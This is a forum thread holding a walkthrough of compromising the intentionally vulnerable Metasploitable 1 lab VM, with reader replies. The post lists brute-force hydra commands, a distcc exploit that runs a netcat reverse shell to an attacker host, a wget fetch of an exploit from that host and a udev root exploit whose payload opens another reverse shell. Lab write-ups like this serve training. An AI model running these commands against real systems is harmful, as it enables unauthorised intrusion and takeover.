Metasploitable 1 - Walkthrough


#1

Hey people!

During my learning process I experimented a lot with this VM. In my opinion the vulnerabilities on this VM are pretty simple and you can optimize and improve your methodology on it.
In this walkthrough I will show you how I go through it without using MSF, Nessus, OpenVAS, etc.

For this I will be using the basic setup of Kali.

Methodology:

  1. Detect Living Host(s)
  2. Open TCP Ports
  3. Open UDP Ports
  4. Service Detection
  5. Service Enumeration
  6. User Enumeration from Services
  7. Password Profiling
  8. Brute Forcing
  9. Detect Running OS
  10. Simple Vulnerabilities Detection
  11. Manual Vulnerabilities Detection
  12. Exploit Research
  13. Exploit Fix
  14. Exploitation
  15. Post-Enumeration
  16. Privilege Escalation
  17. Proofs

Notice that this is my methodology, which I developed for the OSCP, and not necessarily the steps I'll be going through. So I will possibly jump or skip over some topics.

1. Detect Living Host

So at first I want to detect the IP of the metasploitable VM.
I’ll use nmap for it.

nmap -sn -n 10.11.1.0/24 | grep for | cut -d" " -f5

2. Open TCP ports

Now, after detecting the IP of the target (10.11.1.10), I will run a light TCP scan and try to detect open ports and the services running on them.

nmap -n -Pn -sS 10.11.1.10 --open --reason -sV --top-ports 200

Sweet. That's a lot of open ports. :smiley:
So let's run a full and aggressive TCP scan in the background, and at the same time I'll manually scan the Samba & SMTP services, which will hopefully give me some users for this machine.

# nmap -n -Pn -sS 10.11.1.10 --open --reason -A -p- > metasploitable &

Because I found a lot of open ports, I'll jump to the User Enumeration topic.

6. User Enumeration from Services

The heavy scan is running in the background, so we can proceed and try to enumerate some users from the Samba service using enum4linux:
# enum4linux -U 10.11.1.10

Here is the output:

Now I will create a userlist of the Samba service that I will use later.
# !! | grep 'user:' | cut -d'[' -f2 | cut -d']' -f1 > userlist

Let's check if I can find some users using smtp-user-enum.py with the VRFY command:
# smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.11.1.10 > smtp_users

Now I will generate a userlist of all the users I found.
# cat smtp_users | grep exists | cut -d" " -f2 >> users

Nice!
If you noticed above, the heavy TCP scan has finished too.
Let's see which new ports have been found.

7. Password Profiling

For the first step of password profiling I'll use the list of usernames we previously enumerated as the first stage of my password list.
I will return to this point later when we take a look over other services.

8. Brute Forcing

Now the heavy scan shows me two new ports (3632 & 8180). Next I will use hydra to brute-force the FTP, SSH, Telnet, NetBIOS, MySQL and PostgreSQL services and try to log in. As credentials I will use the enumerated usernames as passwords.

### FTP ###
hydra -L users_metasploitable -e nsr ftp://10.11.1.10 -q -o ftp_login

### SSH ###
hydra -L users_metasploitable -e nsr ssh://10.11.1.10 -q -o ssh_login

### Telnet ###
hydra -L users_metasploitable -e nsr telnet://10.11.1.10 -q -o telnet_login

### NetBIOS ###
hydra -L users_metasploitable -e nsr smb://10.11.1.10 -q -o smb_login

### MySQL ###
hydra -L users_metasploitable -e nsr mysql://10.11.1.10 -q -o mysql_login

### PostgreSQL ###
hydra -L users_metasploitable -e nsr postgres://10.11.1.10 -q -o postgres_login

Very nice!
There are a lot of accounts we can use to log in to the machine. :smiley:
But first let me merge the results into one single list.

cat ftp_login mysql_login postgres_login smb_login ssh_login telnet_login | grep host | column -t > metasploitable_accounts

As you can see, it was a quick task and we have some accounts we can use to log in, but the user msfadmin looks like it could be in the sudoers group. So I will start with this user.

9. OS Detection

To identify the exact OS information, I'll start now to enumerate the exact OS, because the banners in the nmap results can be false positives or just not exact enough. So I have to identify the exact OS version manually using SSH.

So let me login using the SSH service:
# ssh msfadmin@10.11.1.10
.. (yes/no)? yes
... password: msfadmin
$ uname -a

Now let's take a look at whether we can run a shell with root privileges.

$ sudo -i
password: msfadmin

One of many ways is done!

Now I have access to a fully privileged account and I'm controlling the system. There exist many other ways to pwn this machine. I showed you the first way I tried out.

Let's see if I can break in using another way.

10. Simple Vulnerability Detection

What I will do is a simple vulnerability scan with nmap.

# nmap --script vuln 10.11.1.10 -p- --open

This scan shows me a lot of vulnerable stuff, but most of them are SSL or DoS vulnerabilities. I picked the distcc daemon because the vulnerability seems to be exploitable.

12. Exploit Research

I found an exploit by using searchsploit pretty fast. There is just one result.

# searchsploit distcc

Mh. The exploit is handled by MSF and I don't want to use it.
So let me think a little bit. Did I miss something?
How did I find this vulnerability? -> Using Nmap.
Ok. I used a script for that.
So let me take a look one more time at the results.

Oh… I overlooked that the script (distcc-cve2004-2687.nse) used the id command for the "Extra Information", which shows me the uid of the current user. :slightly_frowning_face: * shame *
So it looks like Nmap sent this command to the service. Let me take a look at the documentation of this script on the homepage.
NSE-doc: distcc-cve2004-2687.nse

14. Exploitation

Let me change it to possibly get a bind shell using netcat first and then try to connect to it.

Nice! The bind shell works, and additionally I found out the machine has netcat installed. Let me see if a reverse shell works too.
So I set up a listener on port 6666 and then run the nmap script with the cmd for a reverse shell.

# nmap 10.11.1.10 -p 3632 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='nc -nv 10.11.1.11 6666 -e /bin/sh'"

Very nice! Now I have a reverse shell.
Now I want to spawn a TTY using python.

python -c 'import pty; pty.spawn("/bin/sh")'

15. Post-Enumeration

Now I want to get root without interactive mode for sudo. So I have to enumerate some stuff.

$ uname -a
$ cat /proc/version

The kernel & OS version seem to be outdated. * … You don't say… *
I do a quick search on Google to find a privilege escalation exploit specifically for this version.
So I search for Ubuntu 4.2.3-2ubuntu7. Google shows me the name of this version is Hardy.

My next step is to google for this version name. And you can see a few interesting results.
I searched a little bit about every exploit and found CVE-2009-1185 very pretty. I will try it out. In the results before, I found it on exploit-db, so maybe I have it locally already.

searchsploit 8572 linux

Nice!

16. Privilege Escalation

Let’s copy the exploit to my directory.

# locate 8572.c
# cp /usr/share/exploitdb/platforms/lin_x86-64/local/8572.c privescal.c

I want to take a look inside the code to see if I have to take note of some configuration or usage.

So I have to pay attention to

  1. right PID of udevd (PID - 1 as argv[1]),
  2. /tmp/run and
  3. the payload inside it.

Simple usage.
But before I can transfer this exploit I have to set up a basic Python web server on port 8080.

# python -m SimpleHTTPServer 8080

After that I use the reverse shell to get the file with wget from my machine, compile the code, add my payload to /tmp/run and look for the PID.

$ wget http://10.11.1.11:8080/privescal.c
$ gcc privescal.c -o privs
$ echo '#!/bin/sh\n/bin/netcat 10.11.1.11 5555 -e /bin/sh' > /tmp/run
$ ps aux | grep udev

Now I will use the found PID - 1 (2575) for this exploit.

After starting my listener I’m ready to catch the shell…

# nc -nlvp 5555
$ ./privs 2575

Done!

If you have some advice or recommendations to improve my methodology, or want me to add more ways to it, feel free to just tell me.

Thx and have a nice day!
Cry0l1t3

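Merging the hydra result files into one account list, as the post does with cat/grep/column, and labelling which of hydra's -e nsr checks (null, same-as-login, reversed login) each account fell to, so the result doubles as a password-policy audit. This is an added example in Python, not code from the post; the hydra output lines are a constructed sample in hydra's -o format.

```python
import re
from collections import defaultdict

# Constructed sample in hydra's "-o" output format (not from the post);
# one line per successful login, plus hydra's own comment header.
SAMPLE_HYDRA_OUTPUT = """\
# Hydra run on 10.11.1.10 (constructed sample, combined from several -o files)
[21][ftp] host: 10.11.1.10   login: msfadmin   password: msfadmin
[21][ftp] host: 10.11.1.10   login: user   password: user
[22][ssh] host: 10.11.1.10   login: msfadmin   password: msfadmin
[22][ssh] host: 10.11.1.10   login: service   password: ecivres
[23][telnet] host: 10.11.1.10   login: postgres   password: postgres
[5432][postgres] host: 10.11.1.10   login: postgres   password: postgres
[3306][mysql] host: 10.11.1.10   login: root   password:
"""

# [port][service] host: H   login: L   password: P   (password may be empty)
HYDRA_LINE = re.compile(
    r"^\[(?P<port>\d+)\]\[(?P<service>[^\]]+)\]\s+host:\s+(?P<host>\S+)"
    r"\s+login:\s+(?P<login>\S+)\s+password:\s*(?P<password>\S*)\s*$"
)


def parse_hydra(text):
    """Return one dict per result line; hydra's '#' header lines are skipped."""
    return [m.groupdict() for m in map(HYDRA_LINE.match, text.splitlines()) if m]


def weakness(login, password):
    """Name the policy failure that made the account fall to hydra's -e nsr check."""
    if password == "":
        return "null"
    if password == login:
        return "same-as-login"
    if password == login[::-1]:
        return "reversed-login"
    return "wordlist"


def audit(text):
    """Merge all result lines into one row per account:
    (host, login, weakness, comma-separated services it opens)."""
    services = defaultdict(set)
    for r in parse_hydra(text):
        services[(r["host"], r["login"], r["password"])].add(r["service"])
    return [(host, login, weakness(login, pw), ",".join(sorted(svcs)))
            for (host, login, pw), svcs in sorted(services.items())]


if __name__ == "__main__":
    for row in audit(SAMPLE_HYDRA_OUTPUT):
        print("%-12s %-10s %-14s %s" % row)
```

Feed it the concatenated -o files instead of the sample and every account that appears in more than one service shows up as a single row, which is what the post's grep/column pipeline was after.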

(No software interupts) #2

Interesting read mate! I’d like to see in what other ways you were able to pwn the machine besides a brute-force attack.


#3

Especially considering this particular VM is FILLED with holes. ;3


(Mohd Amri) #4

You might wanna check out VulnHub.


(The memelord of 0x00sec) #5

I know I'm a bit late to the party, but a nice walkthrough right there.

Maybe a few fewer screenshots would've been easier on the eyes, but other than that, great writeup.


#6

I will create a few extra ways soon. :wink:


#7

I'd like to add a specific reference to this one, which happens to be a really good and free resource by the Offensive Security team.

Metasploit Unleashed is a course (kinda, more like a paper on the solution) they developed, which I think is important to anyone that wants to get involved with the solution; in it they suggest doing a lot of the testing with Metasploitable. (link below)

Hope this enhances your post :slight_smile:


(system) #8

This topic was automatically closed after 30 days. New replies are no longer allowed.